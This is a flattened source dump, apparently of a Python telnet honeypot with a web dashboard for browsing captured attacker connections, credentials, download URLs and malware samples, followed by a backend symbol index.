        self.need(Telnetd.SB)
        self.need(Telnetd.NAWS)
        w = self.recv_short()
        h = self.recv_short()
        self.need(Telnetd.IAC)
        self.need(Telnetd.SE)
    elif byte == Telnetd.WONT:
        pass
    else:
        raise ValueError()
def test_linemode(self):
#dbg("TEST LINEMODE")
if self.test_opt(34):
self.need(Telnetd.IAC)
self.need(Telnetd.SE)
def test_opt(self, opt, do=True):
#dbg("TEST " + str(opt))
self.send(Telnetd.IAC)
if do:
self.send(Telnetd.DO)
else:
self.send(Telnetd.DONT)
self.send(opt)
def send(self, byte):
#if byte in Telnetd.cmds:
# dbg("SEND " + str(Telnetd.cmds[byte]))
#else:
# dbg("SEND " + str(byte))
self.sock.send(chr(byte))
def send_string(self, msg):
self.sock.send(msg)
#dbg("SEND STRING LEN" + str(len(msg)))
def recv(self):
byte = self.sock.recv(1)
if len(byte) == 0:
raise EOFError
byte = ord(byte)
#if byte in Telnetd.cmds:
# dbg("RECV " + str(Telnetd.cmds[byte]))
#else:
# dbg("RECV " + str(byte))
return byte
def recv_line(self):
line = ""
while True:
byte = self.recv()
if byte == Telnetd.IAC:
byte = self.recv()
self.process_cmd(byte)
elif byte == ord("\r"):
pass
elif byte == ord("\n"):
break
else:
line = line + chr(byte)
#dbg("RECV STRING " + line)
return line
def recv_short(self):
bytes = self.sock.recv(2)
short = struct.unpack("!H", bytes)[0]
#dbg("RECV SHORT " + str(short))
return short
def need(self, byte_need):
    byte = self.recv()
    if byte != byte_need:
        dbg("Protocol error: expected " + str(byte_need) + ", got " + str(byte))
        raise ValueError()
    return byte
def process_cmd(self, cmd):
if cmd == Telnetd.DO:
byte = self.recv()
self.send(Telnetd.IAC)
self.send(Telnetd.WONT)
self.send(byte)
if cmd == Telnetd.WILL or cmd == Telnetd.WONT:
byte = self.recv()
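The negotiation helpers above exchange raw IAC byte sequences on the socket. A standalone byte-level sketch of the NAWS exchange the code expects, using the same constants as the Telnetd class (the 80x24 reply is invented for illustration):

```python
import struct

# Telnet protocol constants, matching the Telnetd class above
IAC, SE, SB, WILL, WONT, DO = 255, 240, 250, 251, 252, 253
NAWS = 31

# What test_opt(NAWS) puts on the wire: IAC DO NAWS
request = bytearray([IAC, DO, NAWS])
print(list(request))                 # [255, 253, 31]

# A client that supports NAWS answers IAC WILL NAWS, then sends its
# window size as IAC SB NAWS <width:16> <height:16> IAC SE -- the two
# big-endian shorts are what recv_short() decodes with struct.
reply = bytearray([IAC, WILL, NAWS, IAC, SB, NAWS])
reply += struct.pack("!HH", 80, 24)  # 80 columns, 24 rows
reply += bytearray([IAC, SE])
w, h = struct.unpack("!HH", bytes(reply[6:10]))
print(w, h)                          # 80 24
```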
================================================
FILE: honeypot.py
================================================
import os
import sys
import signal
import json
import socket
from honeypot.telnet import Telnetd
from honeypot.client import Client
from honeypot.session import Session
from honeypot.shell.shell import test_shell
from util.dbg import dbg
from util.config import config
srv = None
def import_file(fname):
with open(fname, "rb") as fp:
client = Client()
for line in fp:
line = line.strip()
obj = json.loads(line)
if obj["type"] == "connection":
if obj["ip"] != None:
print "conn " + obj["ip"]
client.put_session(obj)
if obj["type"] == "sample":
print "sample " + obj["sha256"]
client.put_sample_info(obj)
def rerun_file(fname):
with open(fname, "rb") as fp:
for line in fp:
line = line.strip()
obj = json.loads(line)
if obj["type"] == "connection":
if obj["ip"] == None: continue
session = Session(sys.stdout.write, obj["ip"])
session.login(obj["user"], obj["pass"])
for event in obj["stream"]:
if not(event["in"]): continue
sys.stdout.write(event["data"])
session.shell(event["data"].strip())
session.end()
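import_file and rerun_file above iterate over a JSON-lines dump: one object per line, with the "type" field selecting connection records from sample records. A sketch of that format with the dispatch logic inlined (all field values here are invented for illustration):

```python
import json

# Two hypothetical dump lines in the format the functions above expect
lines = [
    json.dumps({"type": "connection", "ip": "10.0.0.1",
                "user": "root", "pass": "admin",
                "stream": [{"in": True, "data": "ls\n", "ts": 0.1}]}),
    json.dumps({"type": "sample", "sha256": "ab" * 32}),
]

seen = []
for line in lines:
    obj = json.loads(line.strip())
    # same dispatch as import_file: skip connections without an IP
    if obj["type"] == "connection" and obj["ip"] is not None:
        seen.append("conn " + obj["ip"])
    elif obj["type"] == "sample":
        seen.append("sample " + obj["sha256"][:8])
print(seen)   # ['conn 10.0.0.1', 'sample abababab']
```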
def signal_handler(signal, frame):
dbg('Ctrl+C')
srv.stop()
if not os.path.exists("samples"):
os.makedirs("samples")
if __name__ == "__main__":
action = None
actionArg = None
configFile = None
i = 0
while i+1 < len(sys.argv):
    i += 1
    arg = sys.argv[i]
    if arg == "-c":
        if i+1 < len(sys.argv):
            configFile = sys.argv[i+1]
            print "Using config file " + configFile
            i += 1
            continue
        else:
            print "warning: expected argument after \"-c\""
    elif action == None:
        # first positional argument selects the action
        action = arg
    else:
        # second positional argument, e.g. the dump file for import/rerun
        actionArg = arg
if configFile:
    config.loadUserConfig(configFile)
if action == None:
    socket.setdefaulttimeout(15)
    srv = Telnetd(config.get("telnet_addr"), config.get("telnet_port"))
    signal.signal(signal.SIGINT, signal_handler)
    srv.run()
elif action == "import":
    import_file(actionArg)
elif action == "rerun":
    rerun_file(actionArg)
elif action == "shell":
test_shell()
else:
print "Command " + action + " unknown."
================================================
FILE: html/.gitignore
================================================
db.php
apiurl.js
================================================
FILE: html/admin.html
================================================
<img src="img/icon.svg" style="height: 10em; margin-top: -4em; padding: 1em; background: white;" class="pull-right">
<div class="page-header">
<h1>Administration Area</h1>
</div>
<div class="alert alert-info" role="alert" ng-show="errormsg">{{ errormsg }}</div>
<div ng-show="!loggedin">
<h2>Login</h2>
<form>
<div class="form-group">
<label for="username">Username</label>
<input type="text" class="form-control" ng-model="username" placeholder="Username" id="username">
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" class="form-control" ng-model="password" placeholder="Password" id="password">
</div>
<button type="submit" class="btn btn-default" ng-click="login()">Login</button>
</form>
</div>
<div ng-show="loggedin">
<h2>Add a new user</h2>
<form>
<div class="form-group">
<label for="new_username">New users name</label>
<input type="text" class="form-control" ng-model="new_username" placeholder="Username" id="new_username">
</div>
<div class="form-group">
<label for="new_password">New users password</label>
<input type="password" class="form-control" ng-model="new_password" placeholder="Password" id="new_password">
</div>
<button type="submit" class="btn btn-default" ng-click="addUser()">Add User</button>
</form>
<hr>
<form>
<button type="submit" class="btn btn-default btn-danger" ng-click="logout()">Logout</button>
</form>
</div>
================================================
FILE: html/asn.html
================================================
<h1>ASN Info</h1>
<table class="table">
<tr><td>Name</td><td><b>{{ asn.name }}</b></td></tr>
<tr><td>Country</td><td><img src="img/flags/{{ asn.country.toLowerCase() }}.png"> {{ asn.countryname }}</td></tr>
<tr><td>ASN</td><td>AS{{ asn.asn }}</td></tr>
<tr><td>Internet Registry</td><td>{{ REGISTRIES[asn.reg] }}</td></tr>
<tr><td>More Info</td><td><a href="http://bgp.he.net/AS{{ asn.asn }}" target="_blank"><span class="glyphicon glyphicon-link"></span> AS{{ asn.asn }} on bgp.he.net</a></td></tr>
</table>
<h2>Connections from AS{{ asn.asn }} <small><a href="#/connections?asn_id={{ asn.asn }}">more</a></small></h2>
<div ng-include="'connectionlist-embed.html'"></div>
<h2>URLs located in AS{{ asn.asn }}</h2>
<table class="table">
<tr><th>Connections</th><th>Url</th><th>Sample</th></tr>
<tr ng-repeat="url in asn.urls"><td>{{ url.connections }}</td><td>{{ url.url }}</td><td>{{ url.sample }}</td></tr>
</table>
<small>Coming soon</small>
================================================
FILE: html/common.js
================================================
var fakenames = ["Boar","Stallion","Yak","Beaver","Salamander","Eagle Owl","Impala","Elephant","Chameleon","Argali","Lemur","Addax","Colt","Whale","Dormouse","Budgerigar","Dugong","Squirrel","Okapi","Burro","Fish","Crocodile","Finch","Bison","Gazelle","Basilisk","Puma","Rooster","Moose","Musk Deer","Thorny Devil","Gopher","Gnu","Panther","Porpoise","Lamb","Parakeet","Marmoset","Coati","Alligator","Elk","Antelope","Kitten","Capybara","Mule","Mouse","Civet","Zebu","Horse","Bald Eagle","Raccoon","Pronghorn","Parrot","Llama","Tapir","Duckbill Platypus","Cow","Ewe","Bighorn","Hedgehog","Crow","Mustang","Panda","Otter","Mare","Goat","Dingo","Hog","Mongoose","Guanaco","Walrus","Springbok","Dog","Kangaroo","Badger","Fawn","Octopus","Buffalo","Doe","Camel","Shrew","Lovebird","Gemsbok","Mink","Lynx","Wolverine","Fox","Gorilla","Silver Fox","Wolf","Ground Hog","Meerkat","Pony","Highland Cow","Mynah Bird","Giraffe","Cougar","Eland","Ferret","Rhinoceros"];
function extractHash() {
var table = {};
var values = window.location.hash.substr(1);
values = values.split("&");
for (var i = 0; i < values.length; i++) {
var tuple = values[i].split("=");
var name = tuple[0];
var value = tuple.length > 1 ? tuple[1] : null;
table[name] = value;
}
return table;
}
function formatDate(date) {
var d = new Date(date * 1000);
return d.toTimeString().replace(/.*(\d{2}:\d{2}:\d{2}).*/, "$1");
}
var months = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"];
function formatDay(date) {
var d = new Date(date * 1000);
return d.getDate() + " " + months[d.getMonth()];
}
function formatDateTime(date) {
if (date == null) return "";
var d = new Date(date * 1000);
return d.getDate() + "." + (d.getMonth()+1) + " " + d.toTimeString().replace(/.*(\d{2}:\d{2}):\d{2}.*/, "$1");
}
function time() {
return Math.round(new Date().getTime() / 1000);
}
function nicenull (str, el) {
if (str == null || str == "")
return el;
else
return str;
}
function short (str, l) {
if (!str)
return "None";
return str.length > l ? str.substring(0, l) + "..." : str;
}
function encurl(url) {
return btoa(url);
}
function decurl(url) {
return atob(url);
}
================================================
FILE: html/connection.html
================================================
<h1>Connection Info</h1>
<table class="table">
<tr><td>Date</td><td>{{ formatDate(connection.date) }}</td></tr>
<tr><td>Duration</td><td>{{ connection.duration }} seconds</td></tr>
<tr><td>Network / Malware</td><td>
<a href="#/network/{{ connection.network.id }}">#{{ connection.network.id }}</a>
<span> / </span>
<a href="#/malware/{{ connection.network.malware.id }}">{{ connection.network.malware.name != null ? connection.network.malware.name : fakenames[connection.network.malware.id] }}</a>
</td></tr>
<!-- <tr><td>ID</td><td>{{ connection.id }}</td></tr> -->
<tr><td>Honeypot name</td><td>{{ connection.backend_user }}</td></tr>
<tr>
<td>IP</td>
<td>
<span ng-show="connection.asn"><a href="#/connections?country={{ connection.country }}"><span class="glyphicon glyphicon-screenshot"></span></a> <img src="img/flags/{{ connection.country.toLowerCase() }}.png"> {{ connection.city + ', ' + connection.countryname }} <a target="_blank" href="http://www.openstreetmap.org/?zoom=13&lat={{ connection.latitude }}&lon={{ connection.longitude }}">map</a> <br></span>
<span><a href="#/connections?ip={{ connection.ip }}"><span class="glyphicon glyphicon-screenshot"></span></a></span> {{ connection.ip }}<br>
<span ng-show="connection.asn"><a href="#/asn/{{ connection.asn.asn }}"><span class="glyphicon glyphicon-screenshot"></span></a> AS{{ connection.asn.asn }} <b>{{ connection.asn.name }}</b>
</span><br>
<span ng-show="connection.asn">{{ connection.ipblock }}</span>
</td>
</tr>
<tr><td>User : Password</td><td><a href="#/connections?user={{ connection.user }}"><span class="glyphicon glyphicon-screenshot"></span> "{{ connection.user }}"</a> : <a href="#/connections?password={{ connection.password }}">"{{ connection.password }}" <span class="glyphicon glyphicon-screenshot"></span></a></td></tr>
<tr ng-show="connection.conns_before.length > 0">
<td>Prior Connections</td>
<td>
<p ng-repeat="associate in connection.conns_before">
<a href="{{ '#/connection/' + associate.id }}">{{ formatDate(associate.date) }}</a> from
<img src="img/flags/{{ associate.country.toLowerCase() }}.png"> {{ associate.ip }}
</p>
</td>
</tr>
<tr ng-show="connection.conns_after.length > 0">
<td>Subsequent Connections</td>
<td>
<p ng-repeat="associate in connection.conns_after">
<a href="{{ '#/connection/' + associate.id }}">{{ formatDate(associate.date) }}</a> from
<img src="img/flags/{{ associate.country.toLowerCase() }}.png"> {{ associate.ip }}
</p>
</td>
</tr>
<tr ng-show="connection.tags.length > 0">
<td>Tags</td>
<td>
<a class="btn btn-default btn-xs" ng-repeat="tag in connection.tags" style="margin-right: 1em;" href="#/tag/{{ tag.name }}" data-toggle="tooltip" title="{{ tag.code }}">{{ tag.name }}</a>
</td>
</tr>
</table>
<div ng-show="connection.urls.length > 0">
<h2>URLs gathered</h2>
<table class="table">
<tr>
<th>Url</th>
<th>First Seen</th>
<th>Sample</th>
</tr>
<tr ng-repeat="url in connection.urls">
<td><a href="{{ '#/url/' + encurl(url.url) }}">{{ url.url }}</a></td>
<td>{{ formatDate(url.date) }}</td>
<td><a href="{{ '#/sample/' + url.sample }}">{{ short(url.sample, 16) }}</a></td>
</tr>
</table>
</div>
<div ng-show="connection.text_combined != ''">
<h2>Session text <small> show output <input type="checkbox" ng-model="displayoutput"></small></h2>
<div class="well well-sm code">
<div style="font-size: 0.7em;">Session Text does not include non-ascii characters</div>
<span class="code-line" ng-show="displayoutput || event.in" ng-class="{ isinput: event.in }" ng-repeat="event in connection.stream" title="after {{ event.ts }} s">{{ event.data }}</span>
</div>
</div>
================================================
FILE: html/connectionlist-embed.html
================================================
<table class="table table-condensed">
<tr>
<th>Date</th>
<th ng-show="!filter['ip']">IP</th>
<th ng-show="!filter['asn_id']">ASN</th>
<th ng-show="!filter['country']">Country</th>
<th>Username</th>
<th>Password</th>
<th>№ Urls</th>
</tr>
<tr ng-repeat="connection in connections">
<td><a href="{{ '#/connection/' + connection.id }}">{{ formatDate(connection.date) }}</a></td>
<td ng-show="!filter['ip']"> {{ connection.ip }} <a href="#/connections?ip={{ connection.ip }}"><span class="glyphicon glyphicon-screenshot"></span></a></td>
<td ng-show="!filter['asn_id']">{{ connection.asn.asn }} <a href="#/asn/{{ connection.asn.asn }}"><span class="glyphicon glyphicon-screenshot"></span></a></td>
<td ng-show="!filter['country']"><img src="img/flags/{{ connection.country.toLowerCase() }}.png"> {{ connection.country }} <a href="#/connections?country={{ connection.country }}"><span class="glyphicon glyphicon-screenshot"></span></a></td>
<td>{{ connection.user }} <a href="#/connections?user={{ connection.user }}"><span class="glyphicon glyphicon-screenshot"></span></a></td>
<td>{{ connection.password }} <a href="#/connections?password={{ connection.password }}"><span class="glyphicon glyphicon-screenshot"></span></a></td>
<td>{{ connection.urls }}</td>
</tr>
</table>
================================================
FILE: html/connectionlist.html
================================================
<h2>Connections</h2>
<div class="well well-sm" style="font-family: monospace">
<div style="font-size: 0.7em;">
Filters:
<button style="background:none; border:none; margin:0; padding:0;" type="button" data-toggle="collapse" data-target="#collapseExample" aria-expanded="false" aria-controls="collapseExample">
<span class="glyphicon glyphicon-info-sign"></span>
</button>
<div class="collapse" id="collapseExample">
<p>You may use the URL bar to edit filters.</p>
<p>Available arguments: ["ipblock", "user", "password", "ip", "country", "asn_id"]</p>
</div>
</div>
<span ng-repeat="(k, v) in filter">{{ k }} == <img ng-show="k == 'country'" src="img/flags/{{ v.toLowerCase() }}.png"> {{ v }} {{ k == 'country' ? '(' + COUNTRY_LIST[v] + ')' : '' }} {{ $last ? '' : ', ' }}</span>
</div>
<div ng-include="'connectionlist-embed.html'"></div>
<div class="pull-right">
<button type="button" class="btn btn-default" ng-click="nextpage()">More »</button>
</div>
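The filter help above says filters are edited through the URL bar, with arguments such as `country` or `user` appended as query parameters on the hash route (e.g. `#/connections?country=DE&user=root`). The Angular code that turns such a route into the `filter` object iterated by the view is not part of this file; the sketch below is an illustrative, hand-rolled version of that parsing step (the `parseFilter` helper is hypothetical, not the repo's routing code):

```javascript
// Illustrative helper (not part of the repo): parse the query part of a
// hash route like "#/connections?country=DE&user=root" into a plain
// object of filter key/value pairs, as the view's ng-repeat expects.
function parseFilter(hash) {
    var filter = {};
    var q = hash.indexOf("?");
    if (q === -1) return filter; // no query string, no filters
    hash.substring(q + 1).split("&").forEach(function (pair) {
        if (!pair) return;
        var kv = pair.split("=");
        filter[decodeURIComponent(kv[0])] = decodeURIComponent(kv[1] || "");
    });
    return filter;
}

console.log(parseFilter("#/connections?country=DE&user=root"));
```

A real route may URL-encode values (e.g. a password containing `=`), which is why the sketch runs both key and value through `decodeURIComponent`.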
================================================
FILE: html/countries.js
================================================
var COUNTRY_LIST = {"AF":"Afghanistan","AX":"Åland Islands","AL":"Albania","DZ":"Algeria","AS":"American Samoa","AD":"Andorra","AO":"Angola","AI":"Anguilla","AQ":"Antarctica","AG":"Antigua and Barbuda","AR":"Argentina","AM":"Armenia","AW":"Aruba","AU":"Australia","AT":"Austria","AZ":"Azerbaijan","BS":"Bahamas","BH":"Bahrain","BD":"Bangladesh","BB":"Barbados","BY":"Belarus","BE":"Belgium","BZ":"Belize","BJ":"Benin","BM":"Bermuda","BT":"Bhutan","BO":"Bolivia","BA":"Bosnia and Herzegovina","BW":"Botswana","BV":"Bouvet Island","BR":"Brazil","IO":"British Indian Ocean Territory","BN":"Brunei Darussalam","BG":"Bulgaria","BF":"Burkina Faso","BI":"Burundi","KH":"Cambodia","CM":"Cameroon","CA":"Canada","CV":"Cape Verde","KY":"Cayman Islands","CF":"Central African Republic","TD":"Chad","CL":"Chile","CN":"China","CX":"Christmas Island","CC":"Cocos (Keeling) Islands","CO":"Colombia","KM":"Comoros","CG":"Congo","CD":"Congo, The Democratic Republic of the","CK":"Cook Islands","CR":"Costa Rica","CI":"Cote D'Ivoire","HR":"Croatia","CU":"Cuba","CY":"Cyprus","CZ":"Czech Republic","DK":"Denmark","DJ":"Djibouti","DM":"Dominica","DO":"Dominican Republic","EC":"Ecuador","EG":"Egypt","SV":"El Salvador","GQ":"Equatorial Guinea","ER":"Eritrea","EE":"Estonia","ET":"Ethiopia","FK":"Falkland Islands (Malvinas)","FO":"Faroe Islands","FJ":"Fiji","FI":"Finland","FR":"France","GF":"French Guiana","PF":"French Polynesia","TF":"French Southern Territories","GA":"Gabon","GM":"Gambia","GE":"Georgia","DE":"Germany","GH":"Ghana","GI":"Gibraltar","GR":"Greece","GL":"Greenland","GD":"Grenada","GP":"Guadeloupe","GU":"Guam","GT":"Guatemala","GG":"Guernsey","GN":"Guinea","GW":"Guinea-Bissau","GY":"Guyana","HT":"Haiti","HM":"Heard Island and Mcdonald Islands","VA":"Holy See (Vatican City State)","HN":"Honduras","HK":"Hong Kong","HU":"Hungary","IS":"Iceland","IN":"India","ID":"Indonesia","IR":"Iran, Islamic Republic Of","IQ":"Iraq","IE":"Ireland","IM":"Isle of Man","IL":"Israel","IT":"Italy","JM":"Jamaica","JP":"Japan","JE":"Jersey","JO":"Jordan","KZ":"Kazakhstan","KE":"Kenya","KI":"Kiribati","KP":"Korea, Democratic People's Republic of","KR":"Korea, Republic of","KW":"Kuwait","KG":"Kyrgyzstan","LA":"Lao People's Democratic Republic","LV":"Latvia","LB":"Lebanon","LS":"Lesotho","LR":"Liberia","LY":"Libyan Arab Jamahiriya","LI":"Liechtenstein","LT":"Lithuania","LU":"Luxembourg","MO":"Macao","MK":"Macedonia, The Former Yugoslav Republic of","MG":"Madagascar","MW":"Malawi","MY":"Malaysia","MV":"Maldives","ML":"Mali","MT":"Malta","MH":"Marshall Islands","MQ":"Martinique","MR":"Mauritania","MU":"Mauritius","YT":"Mayotte","MX":"Mexico","FM":"Micronesia, Federated States of","MD":"Moldova, Republic of","MC":"Monaco","MN":"Mongolia","MS":"Montserrat","MA":"Morocco","MZ":"Mozambique","MM":"Myanmar","NA":"Namibia","NR":"Nauru","NP":"Nepal","NL":"Netherlands","AN":"Netherlands Antilles","NC":"New Caledonia","NZ":"New Zealand","NI":"Nicaragua","NE":"Niger","NG":"Nigeria","NU":"Niue","NF":"Norfolk Island","MP":"Northern Mariana Islands","NO":"Norway","OM":"Oman","PK":"Pakistan","PW":"Palau","PS":"Palestinian Territory, Occupied","PA":"Panama","PG":"Papua New Guinea","PY":"Paraguay","PE":"Peru","PH":"Philippines","PN":"Pitcairn","PL":"Poland","PT":"Portugal","PR":"Puerto Rico","QA":"Qatar","RE":"Reunion","RO":"Romania","RU":"Russian Federation","RW":"Rwanda","SH":"Saint Helena","KN":"Saint Kitts and Nevis","LC":"Saint Lucia","PM":"Saint Pierre and Miquelon","VC":"Saint Vincent and the Grenadines","WS":"Samoa","SM":"San Marino","ST":"Sao Tome and Principe","SA":"Saudi Arabia","SN":"Senegal","CS":"Serbia and Montenegro","SC":"Seychelles","SL":"Sierra Leone","SG":"Singapore","SK":"Slovakia","SI":"Slovenia","SB":"Solomon Islands","SO":"Somalia","ZA":"South Africa","GS":"South Georgia and the South Sandwich Islands","ES":"Spain","LK":"Sri Lanka","SD":"Sudan","SR":"Suriname","SJ":"Svalbard and Jan Mayen","SZ":"Swaziland","SE":"Sweden","CH":"Switzerland","SY":"Syrian Arab Republic","TW":"Taiwan, Province of China","TJ":"Tajikistan","TZ":"Tanzania, United Republic of","TH":"Thailand","TL":"Timor-Leste","TG":"Togo","TK":"Tokelau","TO":"Tonga","TT":"Trinidad and Tobago","TN":"Tunisia","TR":"Turkey","TM":"Turkmenistan","TC":"Turks and Caicos Islands","TV":"Tuvalu","UG":"Uganda","UA":"Ukraine","AE":"United Arab Emirates","GB":"United Kingdom","US":"United States","UM":"United States Minor Outlying Islands","UY":"Uruguay","UZ":"Uzbekistan","VU":"Vanuatu","VE":"Venezuela","VN":"Viet Nam","VG":"Virgin Islands, British","VI":"Virgin Islands, U.S.","WF":"Wallis and Futuna","EH":"Western Sahara","YE":"Yemen","ZM":"Zambia","ZW":"Zimbabwe","EU":"European Union"};
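The map above is keyed by ISO 3166-1 alpha-2 codes; views such as the connection list use it to expand a two-letter code into a display name (the filter summary renders `COUNTRY_LIST[v]` next to the flag). A minimal sketch of that lookup, using a trimmed copy of the map and a hypothetical `countryName` helper that is not part of the repo:

```javascript
// Trimmed excerpt of the COUNTRY_LIST map from countries.js.
var COUNTRY_LIST = { "DE": "Germany", "US": "United States", "EU": "European Union" };

// Illustrative helper (not in the repo): resolve an ISO alpha-2 code
// to a display name, falling back to the raw code for unknown entries.
function countryName(code) {
    if (!code) return "";
    var key = code.toUpperCase();
    return COUNTRY_LIST[key] || key;
}

console.log(countryName("de")); // → Germany
console.log(countryName("XX")); // → XX
```

The fallback matters because GeoIP data occasionally yields codes (or empty values) that have no entry in the map.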
================================================
FILE: html/fancy/connhash/index.html
================================================
<!doctype html>
<html>
<head>
<title>Network | Hierarchical layout</title>
<style type="text/css">
body {
font: 10pt sans-serif;
}
#mynetwork {
height: 800px;
border: 1px solid lightgray;
}
</style>
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://visjs.org/dist/vis.js"></script>
<link rel="stylesheet" href="https://visjs.org/dist/vis-network.min.css">
<script type="text/javascript">
var nodes = [];
var edges = [];
var network = null;
var MAX = 2000;
var nodes_dict = {};
function load() {
$.get("http://localhost:5000/connhashtree/20", null, draw);
}
function processNode(node, level) {
var c = (MAX - node.count) / MAX * 255;
nodes.push({
"level": level,
"id": node.connhash,
"label": node.count + "\n" + node.text.replace("/bin/busybox", "").substr(0, 32),
"color": "rgb(" + c + "," + c + "," + c + ")"
});
nodes_dict[node.connhash] = node;
for (var i = 0; i < node.childs.length; i++) {
var child = node.childs[i];
edges.push({
"from": node.connhash,
"to": child.connhash,
"color": { 'color' : 'rgb(0,0,0)' }
});
processNode(child, level + 1);
}
}
function draw(data) {
data = JSON.parse(data);
console.log(data);
for (var key in data) {
processNode(data[key], 0);
}
// create a network
var container = document.getElementById('mynetwork');
var options = {
layout: {
hierarchical: {
direction: "UD"
}
}
};
data = { "edges": edges, "nodes": nodes };
network = new vis.Network(container, data, options);
console.log(data);
// add event listeners
network.on("click", function (params) {
if (params.nodes.length == 1)
{
var node = nodes_dict[params.nodes[0]];
window.location.href = "http://localhost:5000/html/index.html#/connection/" + node.sample_id;
}
});
}
</script>
</head>
<body onload="load();">
<div id="mynetwork"></div>
</body>
</html>
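The page above shades each node of the connhash tree by its connection count: counts near `MAX` render black, rare command sequences render near white. Note the raw expression `(MAX - count) / MAX * 255` goes negative once a count exceeds `MAX`. A standalone version of that mapping, with rounding and clamping added as defensive assumptions (the page itself does neither):

```javascript
var MAX = 2000; // same cap used by the page above

// Map a connection count to a grayscale CSS colour string.
// Clamped to [0, 255] so counts above MAX still produce valid rgb().
function countToColor(count) {
    var c = Math.round((MAX - count) / MAX * 255);
    c = Math.max(0, Math.min(255, c));
    return "rgb(" + c + "," + c + "," + c + ")";
}

console.log(countToColor(MAX)); // → rgb(0,0,0)
console.log(countToColor(0));   // → rgb(255,255,255)
```

Without the clamp, a node seen more than `MAX` times would get a negative channel value, which browsers silently clamp anyway but vis.js passes through as-is.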
================================================
FILE: html/fancy/graph/index.html
================================================
<!doctype html>
<html>
<head>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://visjs.org/dist/vis.js"></script>
<link rel="stylesheet" href="https://visjs.org/dist/vis-network.min.css">
<style type="text/css">
.code {
font-family: monospace;
}
.code-line.isinput {
font-weight: bold;
}
</style>
<script src="../../apiurl.js"></script>
<script type="text/javascript">
var ips = {};
var conns = {};
var urls = {};
var samples = {};
var graph_data = null;
var globalnode = null;
function print(s)
{
console.log(s);
//$("#logbox").append(document.createTextNode( s + "\n" ));
}
function getIPConns(ip, olderthan)
{
var url = api + "/connections?ip=" + ip;
if (olderthan != null) url += "&older_than=" + olderthan + "&";
$.get(url, null, function (data) {
print("IPconns: " + ip + ", " + olderthan);
var myconns = JSON.parse(data);
for (var i = 0; i < myconns.length; i++)
{
getConn(myconns[i].id);
}
if (myconns.length > 0)
{
var date = myconns[myconns.length - 1].date;
getIPConns(ip, date);
}
});
}
function getIP(ip, type)
{
if (ip in ips)
{
return ips[ip];
} else {
print("New ip " + ip);
ips[ip] = {
"ip": ip,
"conns": {},
"neighbors": {},
"type": type
}
//getIPConns(ip, null);
return ips[ip];
}
}
function gotConn(conn)
{
print("Conn: " + conn.id);
// Check if the connection has ANY edge
// associates/urls/samples
//if (conn.urls.length == 0 && conn.conns_before.length == 0 && conn.conns_after.length == 0)
//{
// return;
//}
conns[conn.id] = conn;
var ip = getIP(conn.ip, "ip");
for (var i = 0; i < conn.conns_before.l
SYMBOL INDEX (493 symbols across 36 files)
FILE: backend/additionalinfo.py
function filter_ascii (line 9) | def filter_ascii(string):
function query_txt (line 13) | def query_txt(cname):
function query_a (line 25) | def query_a(cname):
function txt_to_ipinfo (line 37) | def txt_to_ipinfo(txt):
function txt_to_asinfo (line 48) | def txt_to_asinfo(txt):
function get_ip4_info (line 59) | def get_ip4_info(ip):
function get_ip6_info (line 70) | def get_ip6_info(ip):
function get_ip_info (line 84) | def get_ip_info(ip):
function get_asn_info (line 96) | def get_asn_info(asn):
function get_url_info (line 103) | def get_url_info(url):
FILE: backend/authcontroller.py
class AuthController (line 27) | class AuthController:
method __init__ (line 29) | def __init__(self):
method pwhash (line 34) | def pwhash(self, username, password):
method checkInitializeDB (line 38) | def checkInitializeDB(self):
method getUser (line 48) | def getUser(self, username):
method addUser (line 53) | def addUser(self, username, password, id=None):
method checkAdmin (line 61) | def checkAdmin(self, user):
method checkLogin (line 68) | def checkLogin(self, username, password):
FILE: backend/backend.py
function red (line 30) | def red(obj, attributes):
function add_cors (line 49) | def add_cors(response):
function verify_password (line 56) | def verify_password(username, password):
function send_index (line 66) | def send_index():
function serve_static (line 70) | def serve_static(filename):
function add_user (line 82) | def add_user(username):
function test_login (line 99) | def test_login():
function put_conn (line 104) | def put_conn():
function put_sample_info (line 118) | def put_sample_info(sha256):
function update_sample (line 125) | def update_sample(sha256):
function put_sample (line 130) | def put_sample():
function fail (line 141) | def fail(msg = "", code = 400):
function housekeeping (line 148) | def housekeeping():
function get_networks (line 153) | def get_networks():
function get_network (line 157) | def get_network(net_id):
function get_network_locations (line 161) | def get_network_locations(net_id):
function get_network_history (line 167) | def get_network_history(net_id):
function get_network_biggest_history (line 183) | def get_network_biggest_history():
function get_malwares (line 202) | def get_malwares():
function get_sample (line 208) | def get_sample(sha256):
function get_newest_samples (line 216) | def get_newest_samples():
function get_url (line 223) | def get_url(ref_enc):
function get_newest_urls (line 234) | def get_newest_urls():
function get_connection (line 241) | def get_connection(id):
function get_connections (line 249) | def get_connections():
function get_connections_fast (line 264) | def get_connections_fast():
function get_country_stats (line 272) | def get_country_stats():
function get_country_connections (line 277) | def get_country_connections(country):
function get_ip_connections (line 283) | def get_ip_connections(ip):
function get_newest_connections (line 289) | def get_newest_connections():
function get_connection_locations (line 294) | def get_connection_locations():
function get_tag (line 302) | def get_tag(name):
function get_tags (line 310) | def get_tags():
function connhash_tree (line 317) | def connhash_tree(layers):
function get_asn (line 323) | def get_asn(asn):
function run (line 330) | def run():
function stop (line 336) | def stop():
FILE: backend/clientcontroller.py
class ClientController (line 40) | class ClientController:
method __init__ (line 42) | def __init__(self):
method _get_asn (line 59) | def _get_asn(self, asn_id):
method calc_connhash_similiarity (line 73) | def calc_connhash_similiarity(self, h1, h2):
method calc_connhash (line 82) | def calc_connhash(self, stream):
method fill_db_ipranges (line 97) | def fill_db_ipranges(self):
method get_ip_range_offline (line 141) | def get_ip_range_offline(self, ip):
method get_ip_range_online (line 149) | def get_ip_range_online(self, ip):
method get_ip_range (line 172) | def get_ip_range(self, ip):
method get_url_info (line 178) | def get_url_info(self, url):
method do_housekeeping (line 194) | def do_housekeeping(self):
method put_session (line 220) | def put_session(self, session):
method create_network (line 379) | def create_network(self):
method create_url_sample (line 385) | def create_url_sample(self, f):
method put_sample (line 430) | def put_sample(self, data):
method update_vt_result (line 439) | def update_vt_result(self, sample_sha):
FILE: backend/cuckoo.py
class Cuckoo (line 18) | class Cuckoo():
method __init__ (line 20) | def __init__(self, config):
method upload (line 26) | def upload(self, path, name):
